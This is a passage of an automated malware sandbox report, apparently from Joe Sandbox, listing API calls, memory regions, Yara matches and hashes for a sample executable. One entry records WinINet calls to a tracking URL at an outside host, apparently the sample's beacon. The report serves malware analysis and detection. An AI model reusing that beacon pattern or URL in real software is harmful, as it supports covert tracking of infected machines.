  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 0043175A
• _free.LIBCMT ref: 0043176D
• _free.LIBCMT ref: 0043177E
• _free.LIBCMT ref: 0043178F
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
• Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
APIs
• Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
• Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
• GetCurrentThread.KERNEL32 ref: 0041CD09
• Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
• Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
• String ID:
• API String ID: 2583373041-0
• Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
• Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
APIs
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492E8E
  • Part of subcall function 02491321: _wcslen.LIBCMT ref: 02491328
  • Part of subcall function 02491321: _wcslen.LIBCMT ref: 02491344
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024930A1
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: InternetOpen_wcslen
• String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3381584094-4083784958
• Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
• Instruction ID: 1c2729e07f766e1da61ef0d648baf20ecbcd28dc1c6b3c1c4e3a577b2e3f688c
• Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
• Instruction Fuzzy Hash: 315151A5E55344A8E720EFB0BC45B723378FF58712F10643BD518CB2B2E7A19984871E
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 024B896A
• __IsNonwritableInCurrentImage.LIBCMT ref: 024B8A23
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: CurrentImageNonwritable___except_validate_context_record
• String ID: fB$csm
• API String ID: 3480331319-1586063737
• Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction ID: 5a47428dcb69194b8a023fc929edc2f1d6e0dc7c2ffe823d3c0f5e2f806064d1
• Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction Fuzzy Hash: 3C410A34A00248DBCF11DF29C884ADE7BB9AF49328F14815BE9156B391D732D915CFA1
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\hpEAJnNwCB.exe,00000104), ref: 024BF9BA
• _free.LIBCMT ref: 024BFA85
• _free.LIBCMT ref: 024BFA8F
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\hpEAJnNwCB.exe
• API String ID: 2506810119-245902517
• Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
• Instruction ID: b85dcb5899922c8ae1927a32365a157012489019140e0e7e76a0796156e4ca4c
• Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
• Instruction Fuzzy Hash: 04318171A00258EBDB26DF99DC809DEBBFCEF8A710B11406BF80997611D7709A45CBA0
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\hpEAJnNwCB.exe,00000104), ref: 0042F753
• _free.LIBCMT ref: 0042F81E
• _free.LIBCMT ref: 0042F828
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\hpEAJnNwCB.exe
• API String ID: 2506810119-245902517
• Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
• Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
• Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
• Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0249C8DE
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
• Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
• Instruction ID: d057494db3768f074dcbe2801d37f5ae70fdc10ebbafc09334dac90c7717604e
• Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58F02B728402087BCF04E754CC81BEB3B989B09316F04806BDD46AB182EB689946CBA4
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                            • String ID: F(@
                                                                                                                                                                                                                                            • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                            • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                            • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                            • String ID: F(@
                                                                                                                                                                                                                                            • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                            • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                            • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pScheduler
                                                                                                                                                                                                                                            • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                            • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                            • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pContext
                                                                                                                                                                                                                                            • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                            • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                            • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                            • String ID: B
                                                                                                                                                                                                                                            • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                            • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                            • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pScheduler$version
                                                                                                                                                                                                                                            • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                            • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                            • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                            • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                            • Instruction ID: 359585f543fb61817e44aa8209f9bb017510ec38934e65a20ff6745d2fe46f3f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65A158799007869FD762CF1CC8907AEBBE1EF55310F6481AFD485AB381D334A941CB50
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                            • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                            • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                            • Instruction ID: 7822b99a991e891080caa40178be8f32a52878d3b8da4d556e7df8e5e7ee9766
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8412B396005016BDBA56FBDCC44AEF3A6BEF41730F360A1FF41A96690DB7C44458AB1
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                            • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024C047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024C6B51
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024C6BDA
                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024C6BEC
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 024C6BF5
                                                                                                                                                                                                                                              • Part of subcall function 024C390E: RtlAllocateHeap.NTDLL(00000000,0249DAD7,00000000), ref: 024C3940
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2652629310-0
                                                                                                                                                                                                                                            • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                            • Instruction ID: 9d6383ef1c9bff20e68e007ce20f42b9f6b1676b018dced11cf4e67b4ca5493e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E031F436A0021AABDF25CF69CC40DAF7BA9EF84714F16826EEC04D7250EB35D951CB90
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                                                                            • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                            • Instruction ID: 4b208051555370009853c9382d1ac5e2f7cdeb4b72fb4f6fa46d924a994ee6e6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70213E76E00619AFDF04EFA5DC819BEBBB9EF49714F10006AE505A7290D775AD01CFA0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                                                                            • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                            • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                                                                                                                                                                                              • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
• String ID:
• API String ID: 2630251706-0
APIs
• ShowWindow.USER32(00000005), ref: 00401FAF
• UpdateWindow.USER32 ref: 00401FB7
• ShowWindow.USER32(00000000), ref: 00401FCB
• MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Window$Show$MoveUpdate
• String ID:
• API String ID: 1339878773-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 024B934A
  • Part of subcall function 024B9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024B92C6
  • Part of subcall function 024B9297: ___AdjustPointer.LIBCMT ref: 024B92E1
• _UnwindNestedFrames.LIBCMT ref: 024B935F
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024B9370
• CallCatchBlock.LIBVCRUNTIME ref: 024B9398
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
  • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
  • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
• _UnwindNestedFrames.LIBCMT ref: 004290F8
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
• CallCatchBlock.LIBVCRUNTIME ref: 00429131
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378), ref: 024C51C8
• GetLastError.KERNEL32(?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024C2213), ref: 024C51D4
